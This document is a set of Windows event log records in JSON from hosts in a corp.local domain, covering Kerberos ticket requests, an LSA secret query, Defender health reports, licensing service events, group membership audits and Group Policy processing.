{"EventTime":"2021-10-02T18:56:17.278132+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":14337,"OpcodeValue":0,"RecordNumber":190902187,"ExecutionProcessID":512,"ExecutionThreadID":3308,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tIT03$@corp.local\r\n\tAccount Domain:\t\tcorp.local\r\n\tLogon GUID:\t\t{6D65E903-4F68-6C23-8C49-18DBA26D0AAD}\r\n\r\nService Information:\r\n\tService Name:\t\tIT03$\r\n\tService ID:\t\tS-1-5-21-2569713578-3403938347-3732993993-1140\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::ffff:192.168.2.108\r\n\tClient Port:\t\t10587\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service. The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event. 
The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"IT03$@corp.local","TargetDomainName":"corp.local","ServiceName":"IT03$","ServiceSid":"S-1-5-21-2569713578-3403938347-3732993993-1140","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::ffff:192.168.2.108","IpPort":"10587","Status":"0x0","LogonGuid":"{6D65E903-4F68-6C23-8C49-18DBA26D0AAD}","TransmittedServices":"-","EventReceivedTime":"2021-10-02T18:56:19.012510+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:49:13.301811+05:45","Hostname":"IT03.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4662,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12804,"OpcodeValue":0,"RecordNumber":40730118,"ExecutionProcessID":632,"ExecutionThreadID":1460,"Channel":"Security","Message":"An operation was performed on an object.\r\n\r\nSubject :\r\n\tSecurity ID:\t\tS-1-5-19\r\n\tAccount Name:\t\tLOCAL SERVICE\r\n\tAccount Domain:\t\tNT AUTHORITY\r\n\tLogon ID:\t\t0x3E5\r\n\r\nObject:\r\n\tObject Server:\t\tLSA\r\n\tObject Type:\t\tSecretObject\r\n\tObject Name:\t\tPolicy\\Secrets\\$MACHINE.ACC\r\n\tHandle ID:\t\t0x204943ce240\r\n\r\nOperation:\r\n\tOperation Type:\t\tQuery\r\n\tAccesses:\t\tQuery secret value\r\n\t\t\t\t\r\n\tAccess Mask:\t\t0x2\r\n\tProperties:\t\t-\r\n\r\nAdditional Information:\r\n\tParameter 1:\t\t-\r\n\tParameter 2:\t\t-","Category":"Other Object Access Events","Opcode":"Info","SubjectUserSid":"S-1-5-19","SubjectUserName":"LOCAL SERVICE","SubjectDomainName":"NT AUTHORITY","SubjectLogonId":"0x3e5","ObjectServer":"LSA","ObjectType":"SecretObject","ObjectName":"Policy\\Secrets\\$MACHINE.ACC","OperationType":"Query","HandleId":"0x204943ce240","AccessList":"%%5649\r\n\t\t\t\t","AccessMask":"0x2","Properties":"-","AdditionalInfo":"-","AdditionalInfo2":"-","EventReceivedTime":"2021-10-02T18:49:14.787112+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:44:27.643861+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1151,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":22735,"ExecutionProcessID":2080,"ExecutionThreadID":6860,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Endpoint Protection client health report (time in UTC):\r\n \tPlatform version: 4.18.2108.7\r\n \tEngine version: 1.1.18500.10\r\n \tNetwork Realtime Inspection engine version: 1.1.18500.10\r\n \tAntivirus security intelligence version: 1.349.1764.0\r\n \tAntispyware security intelligence version: 1.349.1764.0\r\n \tNetwork Realtime Inspection security intelligence version: 1.349.1764.0\r\n \tRTP state: Enabled\r\n \tOA state: Enabled\r\n \tIOAV state: Enabled\r\n \tBM state: Enabled\r\n \tAntivirus security intelligence age: 0\r\n \tAntispyware security intelligence age: 0\r\n \tLast quick scan age: 3\r\n \tLast full scan age: 368\r\n \tAntivirus security intelligence creation time: 10/1/2021 1:43:02 PM\r\n \tAntispyware security intelligence creation time: 10/1/2021 1:43:03 PM\r\n \tLast quick scan start time: 9/29/2021 5:43:24 AM\r\n \tLast quick scan end time: 9/29/2021 5:49:27 AM\r\n \tLast quick scan source: 2\r\n \tLast full scan start time: 9/28/2020 2:02:02 PM\r\n \tLast full scan end time: 9/28/2020 3:29:41 PM\r\n \tLast full scan source: 1\r\n \tProduct status: 0x00080000\r\n","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Platform version":"4.18.2108.7","Engine version":"1.1.18500.10","NRI engine version":"1.1.18500.10","AV security intelligence version":"1.349.1764.0","AS security intelligence version":"1.349.1764.0","NRI security intelligence version":"1.349.1764.0","RTP 
state":"Enabled","OA state":"Enabled","IOAV state":"Enabled","BM state":"Enabled","Last AV security intelligence age":"0","Last AS security intelligence age":"0","Last quick scan age":"3","Last full scan age":"368","AV security intelligence creation time":"10/1/2021 1:43:02 PM","AS security intelligence creation time":"10/1/2021 1:43:03 PM","Last quick scan start time":"9/29/2021 5:43:24 AM","Last quick scan end time":"9/29/2021 5:49:27 AM","Last quick scan source":"2","Last full scan start time":"9/28/2020 2:02:02 PM","Last full scan end time":"9/28/2020 3:29:41 PM","Last full scan source":"1","Product status":"0x00080000","EventReceivedTime":"2021-10-02T18:44:28.990227+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:15:18.533785+05:45","Hostname":"IT01.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1150,"SourceName":"Microsoft-Windows-Windows Defender","ProviderGuid":"{11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":16503,"ExecutionProcessID":2508,"ExecutionThreadID":2252,"Channel":"Microsoft-Windows-Windows Defender/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Endpoint Protection client is up and running in a healthy state.\r\n \tPlatform version: 4.18.2108.7\r\n \tEngine version: 1.1.18500.10\r\n \tSecurity intelligence version: 1.349.1764.0\r\n","Opcode":"Info","Product Name":"Microsoft Defender Antivirus","Platform version":"4.18.2108.7","Engine version":"1.1.18500.10","Security intelligence version":"1.349.1764.0","EventReceivedTime":"2021-10-02T18:15:20.179273+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:16:28.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":900,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":120549,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Software Protection service is starting.\r\nParameters:trigger=timer;sessionid=0","EventData":"<Data>trigger=timer;sessionid=0</Data>","EventReceivedTime":"2021-10-02T18:16:28.480764+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:16:58.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1003,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":120553,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Software Protection service has completed licensing status check.\r\nApplication Id=55c92734-d682-4d71-983e-d6ec3f16059f\r\nLicensing Status=\n1: 00091344-1ea4-4f37-b789-01750ba6988c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n2: 1226e046-263d-414c-824f-0d4f458cee3a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n3: 1cc95b8e-1b6e-42cc-9768-9e84ce28cc3f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n4: 640e7014-6f45-4106-bd1d-ac17a812a2d1, 1, 1 [(0 [0xC004E003, 0, 0], [( 2 0xC004FD01 0 0 msft:rm/algorithm/inherited/1.0 0x00000000 0)( 1 0x00000000)(?)( 2 0xC004FD01 0 0 msft:rm/algorithm/inherited/1.0 0x00000000 0)(?)(?)(?)(?)])(1 )(2 [0x00000000, 0, 0], [( 6 0xC004F009 0 0)( 1 0x00000000)( 6 0xC004F009 0 0)(?)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)( 11 0x00000000 0xC004FD01)])]\n5: 641f81b2-63c2-47dd-aba7-c24bf651ff85, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n6: 66d129b6-eae9-414e-a39a-ea5b8be961cc, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n7: acf1b4fd-1c55-4f2d-a60b-415ac958ad88, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n8: c2d61e88-5598-4e77-aae2-286dc6670a89, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n9: dcb88f6f-b090-405b-850e-dabcccf3693f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n10: fecbc8f2-a4b1-402a-92e7-5d81a6fe3e80, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n11: 9d0bb49b-21a1-4354-9981-ec5dd9393961, 1, 0 [(0 
[0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n\n","EventData":"<Data>55c92734-d682-4d71-983e-d6ec3f16059f</Data><Data>\n1: 00091344-1ea4-4f37-b789-01750ba6988c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n2: 1226e046-263d-414c-824f-0d4f458cee3a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n3: 1cc95b8e-1b6e-42cc-9768-9e84ce28cc3f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n4: 640e7014-6f45-4106-bd1d-ac17a812a2d1, 1, 1 [(0 [0xC004E003, 0, 0], [( 2 0xC004FD01 0 0 msft:rm/algorithm/inherited/1.0 0x00000000 0)( 1 0x00000000)(?)( 2 0xC004FD01 0 0 msft:rm/algorithm/inherited/1.0 0x00000000 0)(?)(?)(?)(?)])(1 )(2 [0x00000000, 0, 0], [( 6 0xC004F009 0 0)( 1 0x00000000)( 6 0xC004F009 0 0)(?)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)( 11 0x00000000 0xC004FD01)])]\n5: 641f81b2-63c2-47dd-aba7-c24bf651ff85, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n6: 66d129b6-eae9-414e-a39a-ea5b8be961cc, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n7: acf1b4fd-1c55-4f2d-a60b-415ac958ad88, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n8: c2d61e88-5598-4e77-aae2-286dc6670a89, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n9: dcb88f6f-b090-405b-850e-dabcccf3693f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n10: fecbc8f2-a4b1-402a-92e7-5d81a6fe3e80, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n11: 9d0bb49b-21a1-4354-9981-ec5dd9393961, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )]\n\n</Data>","EventReceivedTime":"2021-10-02T18:16:58.884297+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:16:30.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1066,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":120550,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Initialization status for service objects.\r\nC:\\Windows\\system32\\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000\n","EventData":"<Data>C:\\Windows\\system32\\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 
0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000\n</Data>","EventReceivedTime":"2021-10-02T18:16:30.511537+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:16:58.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"ERROR","SeverityValue":4,"Severity":"ERROR","EventID":8198,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":120554,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"License Activation (slui.exe) failed with the following error code:\r\nhr=0xC004FD01\r\nCommand-line arguments:\r\nRuleId=a5b3220c-2d48-42e8-9733-0374090e4a25;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=640e7014-6f45-4106-bd1d-ac17a812a2d1;NotificationInterval=120;Trigger=TimerEvent","EventData":"<Data>hr=0xC004FD01</Data><Data>RuleId=a5b3220c-2d48-42e8-9733-0374090e4a25;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=640e7014-6f45-4106-bd1d-ac17a812a2d1;NotificationInterval=120;Trigger=TimerEvent</Data>","EventReceivedTime":"2021-10-02T18:16:58.884297+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:17:28.000000+05:45","Hostname":"DC01.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":903,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":120556,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"The Software Protection service has stopped.\r\n","EventData":"","EventReceivedTime":"2021-10-02T18:17:29.180767+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:38:47.190773+05:45","Hostname":"IT03","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16384,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":30309,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Successfully scheduled Software Protection service for re-start at 2021-12-24T04:52:47Z. Reason: RulesEngine.","EventData":"<Data>2021-12-24T04:52:47Z</Data><Data>RulesEngine</Data>","EventReceivedTime":"2021-10-02T18:38:47.646929+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:17:28.633827+05:45","Hostname":"DC01.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4985,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12800,"OpcodeValue":0,"RecordNumber":190901618,"ExecutionProcessID":4,"ExecutionThreadID":2072,"Channel":"Security","Message":"The state of a transaction has changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tDC01$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E4\r\n\r\nTransaction Information:\r\n\tRM Transaction ID:\t{B15BDFD3-22EF-11EC-8113-000C29E1A995}\r\n\tNew State:\t\t48\r\n\tResource Manager:\t{C5A4AB64-1566-11EA-8E95-C4E8ECDC585D}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x390\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe","Category":"File System","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"DC01$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e4","TransactionId":"{B15BDFD3-22EF-11EC-8113-000C29E1A995}","NewState":"48","ResourceManager":"{C5A4AB64-1566-11EA-8E95-C4E8ECDC585D}","ProcessId":"0x390","ProcessName":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2021-10-02T18:17:30.196370+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:38:16.784396+05:45","Hostname":"IT03","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":16394,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":30308,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Offline downlevel migration succeeded.","EventData":"","EventReceivedTime":"2021-10-02T18:38:17.487732+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:59:54.910888+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4627,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":12554,"OpcodeValue":0,"RecordNumber":18995517,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":4224,"Channel":"Security","Message":"Group membership information.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-0-0\r\n\tAccount Name:\t\t-\r\n\tAccount Domain:\t\t-\r\n\tLogon ID:\t\t0x0\r\n\r\nLogon Type:\t\t\t3\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tcorp.local\r\n\tLogon ID:\t\t0x53A30F62\r\n\r\nEvent in sequence:\t\t1 of 1\r\n\r\nGroup Membership:\t\t\t\r\n\t\t%{S-1-5-32-544}\r\n\t\t%{S-1-1-0}\r\n\t\t%{S-1-5-32-545}\r\n\t\t%{S-1-5-2}\r\n\t\t%{S-1-5-11}\r\n\t\t%{S-1-5-15}\r\n\t\t%{S-1-5-21-2569713578-3403938347-3732993993-2102}\r\n\t\t%{S-1-5-21-2569713578-3403938347-3732993993-515}\r\n\t\t%{S-1-18-1}\r\n\t\t%{S-1-16-16384}\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThis event is generated when the Audit Group Membership subcategory is configured. 
The Logon ID field can be used to correlate this event with the corresponding user logon event as well as to any other security audit events generated during this logon session.","Category":"Group Membership","Opcode":"Info","SubjectUserSid":"S-1-0-0","SubjectUserName":"-","SubjectDomainName":"-","SubjectLogonId":"0x0","TargetUserSid":"S-1-5-18","TargetUserName":"IT02$","TargetDomainName":"corp.local","TargetLogonId":"0x53a30f62","LogonType":"3","EventIdx":"1","EventCountTotal":"1","GroupMembership":"\n\t\t%{S-1-5-32-544}\n\t\t%{S-1-1-0}\n\t\t%{S-1-5-32-545}\n\t\t%{S-1-5-2}\n\t\t%{S-1-5-11}\n\t\t%{S-1-5-15}\n\t\t%{S-1-5-21-2569713578-3403938347-3732993993-2102}\n\t\t%{S-1-5-21-2569713578-3403938347-3732993993-515}\n\t\t%{S-1-18-1}\n\t\t%{S-1-16-16384}","EventReceivedTime":"2021-10-02T18:59:56.913085+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:41:40.074596+05:45","Hostname":"ACC01.prod.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1001,"SourceName":"Windows Error Reporting","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":161752,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Fault bucket , type 0\r\nEvent Name: StoreAgentScanForUpdatesFailure0\r\nResponse: Not available\r\nCab Id: 0\r\n\r\nProblem signature:\r\nP1: Update;\r\nP2: 80072f8f\r\nP3: 19042\r\nP4: 685\r\nP5: Windows.Desktop\r\nP6: \r\nP7: \r\nP8: \r\nP9: \r\nP10: \r\n\r\nAttached files:\r\n\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp\\WER2493.tmp.WERInternalMetadata.xml\r\n\r\nThese files may be available here:\r\n\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\NonCritical_Update;_89a4bf0b82c8e65905826d66248b275798ae419_00000000_a1f856a3-9fe5-463e-baf4-3f2a2e2c7514\r\n\r\nAnalysis symbol: \r\nRechecking for solution: 0\r\nReport Id: a1f856a3-9fe5-463e-baf4-3f2a2e2c7514\r\nReport Status: 524388\r\nHashed bucket: \r\nCab Guid: 0","Opcode":"Info","Data":"0","Data_1":"StoreAgentScanForUpdatesFailure0","Data_2":"Not available","Data_3":"0","Data_4":"Update;","Data_5":"80072f8f","Data_6":"19042","Data_7":"685","Data_8":"Windows.Desktop","Data_9":"\n\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\Temp\\WER2493.tmp.WERInternalMetadata.xml","Data_10":"\\\\?\\C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\NonCritical_Update;_89a4bf0b82c8e65905826d66248b275798ae419_00000000_a1f856a3-9fe5-463e-baf4-3f2a2e2c7514","Data_11":"0","Data_12":"a1f856a3-9fe5-463e-baf4-3f2a2e2c7514","Data_13":"524388","Data_14":"0","EventReceivedTime":"2021-10-02T18:41:40.293333+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:59:56.732971+05:45","Hostname":"IT02.corp.local","Keywords":"9232379236109516800","EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4735,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"TaskValue":13826,"OpcodeValue":0,"RecordNumber":18995519,"ActivityID":"{7870D080-A924-0001-B9D0-707824A9D701}","ExecutionProcessID":724,"ExecutionThreadID":6812,"Channel":"Security","Message":"A security-enabled local group was changed.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-18\r\n\tAccount Name:\t\tIT02$\r\n\tAccount Domain:\t\tCORP\r\n\tLogon ID:\t\t0x3E7\r\n\r\nGroup:\r\n\tSecurity ID:\t\tS-1-5-32-544\r\n\tGroup Name:\t\tAdministrators\r\n\tGroup Domain:\t\tBuiltin\r\n\r\nChanged Attributes:\r\n\tSAM Account Name:\t-\r\n\tSID History:\t\t-\r\n\r\nAdditional Information:\r\n\tPrivileges:\t\t-","Category":"Security Group Management","Opcode":"Info","TargetUserName":"Administrators","TargetDomainName":"Builtin","TargetSid":"S-1-5-32-544","SubjectUserSid":"S-1-5-18","SubjectUserName":"IT02$","SubjectDomainName":"CORP","SubjectLogonId":"0x3e7","PrivilegeList":"-","SamAccountName":"-","SidHistory":"-","EventReceivedTime":"2021-10-02T18:59:58.024952+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T18:59:57.420599+05:45","Hostname":"IT02.corp.local","Keywords":"9223372036854775808","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1500,"SourceName":"Microsoft-Windows-GroupPolicy","ProviderGuid":"{AEA1B4FA-97D1-45F2-A64C-4D69FFFD92C9}","Version":0,"TaskValue":0,"OpcodeValue":1,"RecordNumber":82792,"ActivityID":"{EA13959B-F208-4396-8C6D-FAA8FE827CF8}","ExecutionProcessID":4688,"ExecutionThreadID":9024,"Channel":"System","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"The Group Policy settings for the computer were processed successfully. There were no changes detected since the last successful processing of Group Policy.","Opcode":"Start","SupportInfo1":"1","SupportInfo2":"4292","ProcessingMode":"0","ProcessingTimeInMilliseconds":"3047","DCName":"\\\\DC01.corp.local","EventReceivedTime":"2021-10-02T18:59:59.046195+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
{"EventTime":"2021-10-02T17:00:58.262835+05:45","Hostname":"IT02.corp.local","Keywords":"36028797018963968","EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1704,"SourceName":"SceCli","Version":0,"TaskValue":0,"OpcodeValue":0,"RecordNumber":70112,"ExecutionProcessID":0,"ExecutionThreadID":0,"Channel":"Application","Message":"Security policy in the Group policy objects has been applied successfully.","EventReceivedTime":"2021-10-02T17:00:58.790833+05:45","SourceModuleName":"in_win","SourceModuleType":"im_msvistalog"}
